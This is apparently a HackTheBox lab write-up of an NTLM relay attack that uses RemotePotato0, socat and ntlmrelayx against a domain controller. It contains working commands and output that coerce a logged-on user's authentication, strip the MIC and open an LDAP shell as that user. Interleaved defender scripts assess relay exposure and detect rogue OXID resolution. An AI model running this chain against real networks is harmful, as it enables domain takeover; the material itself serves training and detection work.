RemotePotato0
1. Prerequisites
A high-privileged user must be logged on to the target.
RemotePotato0 abuses the DCOM activation service to trigger NTLM authentication from any user currently logged on to the target machine.
2. Exploitation method 1
2.1.1. socat port forwarding
Use socat to forward traffic arriving on port 135 of our tun0 interface to port 9999 on WEB01:
The listening port here cannot be anything else, because the DCOM client only talks to port 135 when performing OXID resolution.
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# socat TCP-LISTEN:135,bind=10.10.14.10,fork,reuseaddr TCP:192.168.100.2:9999
2.1.2. ntlmrelayx
Start a listener with ntlmrelayx and relay the received NTLM authentication to LDAPS on DC01.
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# nxc smb 10.129.124.28 -u guest -p ''
SMB 10.129.124.28 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.124.28 445 DC01 [-] pirate.htb\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# nxc ldap 10.129.124.28 -u guest -p ''
LDAP 10.129.124.28 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.124.28 389 DC01 [-] pirate.htb\guest: STATUS_ACCOUNT_DISABLED
- Because the domain controller DC01 requires SMB signing, relaying to SMB is not possible; LDAP channel binding is not enabled, so relaying to LDAPS or LDAP works here
- Other protocols could be chosen too, such as HTTP, HTTPS or MSSQL, but each requires the corresponding service to be configured for Windows authentication (NTLM/Negotiate)
- Later we will use a.white's LDAP shell to change a.white.adm's password, and AD only allows that operation over an encrypted channel, so LDAPS is chosen here
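The protocol choice above boils down to reading three fields in the nxc banner: SMB signing, LDAP signing and LDAP channel binding. The following Python script is an added defender-side example (not part of this write-up or of nxc) that parses nxc-style banner lines, reports which relay targets are still open, and names the standard Windows setting that closes each one. The sample lines are constructed to match the output above; the regex and field names assume nxc's "(key:value)" banner format.

```python
"""Assess NTLM relay exposure from nxc banner lines (added example, not part of the write-up).

Parses the "(key:value)" fields nxc prints for SMB and LDAP and decides, per
protocol, whether a relayed NTLM authentication would be accepted. The sample
lines are constructed to match the output above; the settings under
HARDENING are the standard Windows controls for each protocol.
"""
import re

# Constructed sample, modelled on the nxc output in this write-up.
SAMPLE_OUTPUT = """\
SMB  10.129.124.28 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB  10.129.124.28 445 DC01 [-] pirate.htb\\guest: STATUS_ACCOUNT_DISABLED
LDAP 10.129.124.28 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.124.28 389 DC01 [-] pirate.htb\\guest: STATUS_ACCOUNT_DISABLED
"""

# Matches "(name:DC01)", "(channel binding:Never)", "(signing:True)" and similar.
FIELD_RE = re.compile(r"\(([^:()]+):([^()]*)\)")

HARDENING = {
    "SMB": "Microsoft network server: Digitally sign communications (always) = Enabled",
    "LDAP": "Domain controller: LDAP server signing requirements = Require signing (LDAPServerIntegrity=2)",
    "LDAPS": "LdapEnforceChannelBinding = 2 (Always) under HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters",
}


def parse_banner(line):
    """Return (protocol, host, fields) for an nxc '[*]' banner line, else None."""
    parts = line.split(maxsplit=4)
    if len(parts) < 5 or not parts[4].startswith("[*]"):
        return None
    fields = {k.strip().lower(): v.strip() for k, v in FIELD_RE.findall(parts[4])}
    return parts[0], parts[1], fields


def assess_relay_exposure(output):
    """Map protocol -> (relayable, reason). A missing field is treated as unprotected."""
    findings = {}
    for line in output.splitlines():
        parsed = parse_banner(line)
        if parsed is None:
            continue
        proto, _host, f = parsed
        if proto == "SMB":
            # signing:True means the server requires signing; a relayed session cannot sign.
            if f.get("signing") == "True":
                findings["SMB"] = (False, "SMB signing required")
            else:
                findings["SMB"] = (True, "SMB signing not required")
        elif proto == "LDAP":
            # nxc prints signing:None when LDAP signing is not enforced (as on this DC) ...
            signing = f.get("signing", "None")
            findings["LDAP"] = (signing == "None",
                                "LDAP signing not enforced" if signing == "None" else f"LDAP signing: {signing}")
            # ... and channel binding:Never when LDAPS does not require channel binding.
            cb = f.get("channel binding", "Never")
            findings["LDAPS"] = (cb == "Never",
                                 "no channel binding on LDAPS" if cb == "Never" else f"channel binding: {cb}")
    return findings


def remediation(findings):
    """List the hardening setting for every protocol still marked relayable."""
    return [HARDENING[p] for p, (relayable, _) in sorted(findings.items()) if relayable]


if __name__ == "__main__":
    result = assess_relay_exposure(SAMPLE_OUTPUT)
    for proto, (relayable, reason) in sorted(result.items()):
        print(f"{proto:5s} {'RELAYABLE' if relayable else 'protected':9s} {reason}")
    for fix in remediation(result):
        print("fix:", fix)
```

Run against the sample it reports SMB as protected and LDAP/LDAPS as relayable, which is exactly the situation the bullets above describe; pasting a real nxc run into SAMPLE_OUTPUT gives the same verdict for another domain controller.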
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# ntlmrelayx.py -t ldaps://10.129.124.28 --remove-mic --http-port 80 -smb2support --no-da --no-acl --no-validate-privs -i
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
Exception in thread Thread-7:
Traceback (most recent call last):
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/root/.local/share/uv/tools/impacket/lib/python3.11/site-packages/impacket/examples/ntlmrelayx/servers/rpcrelayserver.py", line 424, in run
self.server = self.RPCSocketServer((self.config.interfaceIp, self.config.listeningPort), self.RPCHandler,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/impacket/lib/python3.11/site-packages/impacket/examples/ntlmrelayx/servers/rpcrelayserver.py", line 41, in __init__
socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/socketserver.py", line 456, in __init__
self.server_bind()
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/socketserver.py", line 472, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
[*] Multirelay disabled
[*] Servers started, waiting for connections
This error can be ignored.
- -t ldaps://10.129.124.28: target IP and protocol
- --remove-mic: strips the NTLM MIC, used to bypass NTLM relay protections
- --http-port 80: listen on local port 80, because the incoming NTLM authentication targets an HTTP service
- --no-da: do not automatically add a domain admin, reduces noise
- --no-acl: do not modify ACLs, reduces noise
- --no-validate-privs: do not validate privileges, reduces noise
- -i: start an interactive LDAP shell
2.1.3. RemotePotato0 triggers coerced NTLM authentication
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ./RemotePotato0.exe -m 0 -r 10.10.14.10 -x 10.10.14.10 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.10.14.10 to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the NTLM relay attack, launch ntlmrelayx on 10.10.14.10!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to ntlmrelayx HTTP Server 10.10.14.10 on port 80
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] Got NTLM type 3 AUTH message from PIRATE\a.white with hostname WEB01
[+] Relaying seems successfull, check ntlmrelayx output!
- -m 0: Rpc2Http cross-protocol relay server + potato trigger mode, the most commonly used
- -r 10.10.14.10: remote relay server IP
- -x 10.10.14.10: rogue OXID resolver IP
- -p 9999: OXID resolver port
At this point my ntlmrelayx also received the relayed authentication:
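The trigger above shows the network shape a defender can look for: the victim's DCOM client is sent to a rogue OXID resolver on TCP 135 at an address that is not a domain controller, and immediately afterwards the same host authenticates to a listener (here HTTP on port 80) at that same address. The following Python script is an added detection example (not part of this write-up or of RemotePotato0) that applies that logic to constructed, simplified renderings of Sysmon Event ID 3 (network connection) records. The field names follow Sysmon; the lines themselves are made up, and KNOWN_RPC_ENDPOINTS is a hypothetical allowlist of hosts that legitimately answer endpoint-mapper and OXID queries.

```python
"""Detect outbound OXID resolution to untrusted hosts (added example, not part of the write-up).

A RemotePotato0-style trigger makes the victim's DCOM client resolve an OXID
from a rogue resolver on TCP 135 and then authenticate to a relay listener on
the same address. The records below are constructed, simplified renderings of
Sysmon Event ID 3 (network connection) events; the field names follow Sysmon,
the lines themselves are made up for this example, and KNOWN_RPC_ENDPOINTS is a
hypothetical allowlist of hosts that legitimately answer endpoint-mapper queries.
"""

# Constructed sample events: a normal endpoint-mapper query to the DC, then the
# pattern from this write-up (port 135 followed by port 80 to one outside host),
# an unrelated LDAP connection, and an inbound (not initiated) 135 on the DC.
SAMPLE_EVENTS = [
    "EventID=3|Computer=WEB01|Image=C:\\Windows\\System32\\svchost.exe|DestinationIp=10.129.124.28|DestinationPort=135|Initiated=true",
    "EventID=3|Computer=WEB01|Image=C:\\Windows\\System32\\svchost.exe|DestinationIp=10.10.14.10|DestinationPort=135|Initiated=true",
    "EventID=3|Computer=WEB01|Image=C:\\Windows\\System32\\svchost.exe|DestinationIp=10.10.14.10|DestinationPort=80|Initiated=true",
    "EventID=3|Computer=WEB01|Image=C:\\Program Files\\App\\app.exe|DestinationIp=10.129.124.28|DestinationPort=389|Initiated=true",
    "EventID=3|Computer=DC01|Image=C:\\Windows\\System32\\lsass.exe|DestinationIp=10.10.14.10|DestinationPort=135|Initiated=false",
]

KNOWN_RPC_ENDPOINTS = {"10.129.124.28"}  # hypothetical allowlist: the domain controller(s)
# Ports of services that accept NTLM and are therefore usable as relay targets.
RELAY_PORTS = {"80", "443", "389", "636", "445", "1433", "5985", "5986"}


def parse_event(line):
    """Turn one 'key=value|key=value' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def is_rogue_oxid_resolution(ev, allowlist):
    """True when a host *initiates* TCP 135 to an address outside the allowlist."""
    return (ev.get("EventID") == "3"
            and ev.get("Initiated") == "true"
            and ev.get("DestinationPort") == "135"
            and ev.get("DestinationIp") not in allowlist)


def detect(lines, allowlist=KNOWN_RPC_ENDPOINTS):
    """Return one alert per suspicious 135 connection; severity is 'high' when the
    same source host also talked to that address on a port that accepts NTLM."""
    events = [parse_event(line) for line in lines]
    alerts = []
    for ev in events:
        if not is_rogue_oxid_resolution(ev, allowlist):
            continue
        dst = ev["DestinationIp"]
        followups = sorted({e["DestinationPort"] for e in events
                            if e.get("Computer") == ev.get("Computer")
                            and e.get("Initiated") == "true"
                            and e.get("DestinationIp") == dst
                            and e.get("DestinationPort") in RELAY_PORTS})
        alerts.append({
            "computer": ev.get("Computer"),
            "image": ev.get("Image"),
            "destination": dst,
            "followup_ports": followups,
            "severity": "high" if followups else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample this yields a single high-severity alert for WEB01 talking to 10.10.14.10 on 135 and then 80. In a real environment the allowlist should hold the domain controllers and any servers that legitimately host DCOM objects, since member-server-to-member-server DCOM also goes through port 135; the medium/high split keeps a lone lookup from drowning out the lookup-plus-authentication pair that characterises a relay.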
OSError: [Errno 98] Address already in use
[*] (HTTP): Client requested path: /
[*] (HTTP): Connection from 10.129.124.28 controlled, attacking target ldaps://10.129.124.28
[*] (HTTP): Client requested path: /
[*] (HTTP): Authenticating connection from PIRATE/A.WHITE@10.129.124.28 against ldaps://10.129.124.28 SUCCEED [1]
[*] ldaps://PIRATE/A.WHITE@10.129.124.28 [1] -> Started interactive Ldap shell via TCP on 127.0.0.1:11000 as PIRATE/A.WHITE
At this point a one-shot LDAP shell is opened on 127.0.0.1:11000.